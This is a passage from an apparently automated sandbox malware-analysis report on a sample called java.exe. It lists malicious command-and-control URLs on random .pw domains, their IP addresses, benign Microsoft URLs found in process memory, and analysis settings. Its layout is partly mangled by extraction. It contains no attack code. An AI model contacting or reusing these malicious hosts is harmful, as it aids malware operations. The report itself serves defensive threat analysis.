http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | 15% | Virustotal |
http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | 17% | Virustotal |
http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | 12% | Virustotal |
Domains and IPs
Name | IP | Active | Malicious | Antivirus Detection | Reputation
vcklmnnejwxx.pw | 216.218.185.162 | true | true | | unknown
uyhgqunqkxnx.pw | 178.62.201.34 | true | true | | unknown
mfueeimvyrsp.pw | 216.218.185.162 | true | true | | unknown
spaines.pw | 216.218.185.162 | true | true | | unknown
cmnsgscccrej.pw | 216.218.185.162 | true | true | | unknown
evbsdqvgmpph.pw | 216.218.185.162 | true | true | | unknown
utmyhnffxpcj.pw | 216.218.185.162 | true | true | | unknown
gfnlmtcolrrb.pw | 216.218.185.162 | true | true | | unknown
fkmmvfeonnyh.pw | 216.218.185.162 | true | true | | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://evbsdqvgmpph.pw/EiDQjNbWEQ/ | true | 15% Virustotal; Avira URL Cloud: malware | unknown
http://uyhgqunqkxnx.pw/EiDQjNbWEQ/ | true | 13% Virustotal; Avira URL Cloud: malware | unknown
http://spaines.pw/EiDQjNbWEQ/ | true | 12% Virustotal; Avira URL Cloud: malware | unknown
http://cmnsgscccrej.pw/EiDQjNbWEQ/ | true | 17% Virustotal; Avira URL Cloud: malware | unknown
http://mfueeimvyrsp.pw/EiDQjNbWEQ/ | true | 9% Virustotal; Avira URL Cloud: malware | unknown
http://gfnlmtcolrrb.pw/EiDQjNbWEQ/ | true | 15% Virustotal; Avira URL Cloud: malware | unknown
http://vcklmnnejwxx.pw/EiDQjNbWEQ/ | true | 12% Virustotal; Avira URL Cloud: malware | unknown
http://fkmmvfeonnyh.pw/EiDQjNbWEQ/ | true | 17% Virustotal; Avira URL Cloud: malware | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/odirmr | explorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.activity.windows.com/v1/assets | svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs | SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingaotak | SearchApp.exe, 0000000B.00000000.1771194064.0000024B423E8000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1755590053.0000024340029000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://excel.office.com | explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://outlook.office.com/M365.Access | SearchApp.exe, 0000000B.00000000.1805286472.0000024B447CF000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000003.00000000.1638855988.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://substrate.office.com/SubstrateSearch-Internal.ReadWriteO | SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://wns.windows.com/L | explorer.exe, 00000003.00000002.3059382822.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1638855988.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://word.office.com | explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu | explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs | SearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow- | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://%s.xboxlive.com | svchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://outlook.com | StartMenuExperienceHost.exe, 00000009.00000002.2911384205.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728745445.000001B9814D0000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://login.windows.net/ | svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://substrate.office.com/search/api/v1/events?scenario= | SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.rd.com/list/polite-habits-campers-dislike/ | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://android.notify.windows.com/iOS | explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://outlook.office.com/User.ReadWriteK | SearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://aefd.nelreports.net/api/report?cat=bingrms | SearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img | explorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://powerpoint.office.comxee | StartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com_ | explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | low
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at | explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://fb.me/react-polyfillsThis | SearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://xsts.auth.xboxlive.com/ | svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://login.windows.net | svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://windows.msn.com/shell | SearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl | explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | high
https://powerpoint.office.comcember | explorer.exe, 00000003.00000000.1638855988.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3059382822.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://xsts.auth.xboxlive.com | svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmp | false | |
                                                                                      high
                                                                                      https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.microexplorer.exe, 00000003.00000002.3045067363.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1635099926.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3023688229.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 0000000A.00000002.2963352033.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://msit.loki.delve.office.com/apiQSearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://login.windows.localsvchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://substrate.office.com/M365.AccessSearchApp.exe, 0000000B.00000000.1763641682.0000024B41B40000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://www.ng.comSearchApp.exe, 0000000B.00000000.1771563723.0000024B4248E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqsSearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000B.00000000.1797450893.0000024B44184000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-miexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://api.msn.com/qexplorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://windows.msn.cn/shellRESPSearchApp.exe, 0000000B.00000000.1752124326.0000024339C00000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&ocexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://gcc.loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svgexplorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-darkexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-Aexplorer.exe, 00000003.00000002.2985052008.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://unitedstates4.ss.wd.microsoft.ussmartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • 1%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://unitedstates2.ss.wd.microsoft.ussmartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • 0%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://unitedstates1.ss.wd.microsoft.ussmartscreen.exe, 00000010.00000002.2966541027.000001A22A337000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    • 1%, Virustotal, Browse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://loki.delve.office.com/apiSearchApp.exe, 0000000B.00000000.1769589682.0000024B4218C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://searchapp.bundleassets.example/desktop/2.htmlSearchApp.exe, 0000000B.00000000.1766436902.0000024B41E30000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://assets.activity.windows.comersvchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqshttps://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmSearchApp.exe, 0000000B.00000000.1829269370.0000024B55240000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://assets.activity.windows.comssvchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://aefd.nelreports.net/api/report?cat=wsbSearchApp.exe, 0000000B.00000000.1767315960.0000024B41F45000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headereventexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://activity.windows.comtsvchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://login.windows.local/svchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://aka.ms/Vh5j3kexplorer.exe, 00000003.00000000.1634162143.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2985052008.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://api.msn.com/v1/news/Feed/Windows?&explorer.exe, 00000003.00000002.3031801494.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000096DF000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svgexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/mail/deeplink/attachment/SearchApp.exe, 0000000B.00000000.1829269370.0000024B55259000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/arexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://fb.me/react-polyfillsSearchApp.exe, 0000000B.00000000.1808464287.0000024B44916000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://api.msn.com/explorer.exe, 00000003.00000002.3031801494.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1636199688.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://assets.activity.windows.comsvchost.exe, 00000005.00000000.1715119977.00000151A4A90000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2921088315.00000151A4A90000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-dexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://gcchigh.loki.office365.us/api/SearchApp.exe, 0000000B.00000000.1769491887.0000024B42180000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://activity.windows.comsvchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://excel.office.comcpStartMenuExperienceHost.exe, 00000009.00000002.2905023866.000001B98144E000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 00000009.00000000.1728659205.000001B98144E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                unknown
                                                                                                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-darkexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://www.msn.com:443/en-us/feedexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://assets.activity.windows.com/v1/assets/$batchsvchost.exe, 00000005.00000000.1715061141.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2917556566.00000151A4A41000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.2922265482.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715147840.00000151A4AAE000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-ofexplorer.exe, 00000003.00000002.2985052008.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1634162143.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://%s.dnet.xboxlive.comsvchost.exe, 00000005.00000002.2919603174.00000151A4A65000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000005.00000000.1715089541.00000151A4A65000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        low
                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
216.218.185.162 | vcklmnnejwxx.pw | United States | 6939 | HURRICANEUS | true
178.62.201.34 | uyhgqunqkxnx.pw | European Union | 14061 | DIGITALOCEAN-ASNUS | true
173.222.162.32 | unknown | United States | 35994 | AKAMAI-ASUS | false
Joe Sandbox version: 38.0.0 Ammolite
Analysis ID: 1378065
Start date and time: 2024-01-20 20:40:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 0s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 36
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: java.exe
Detection: MAL
                                                                                                                                                        Classification:mal100.bank.expl.evad.winEXE@10/10@9/3
                                                                                                                                                        EGA Information:
                                                                                                                                                        • Successful, ratio: 100%
                                                                                                                                                        HCA Information:
                                                                                                                                                        • Successful, ratio: 96%
                                                                                                                                                        • Number of executed functions: 125
                                                                                                                                                        • Number of non-executed functions: 67
                                                                                                                                                        Cookbook Comments:
                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                                                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
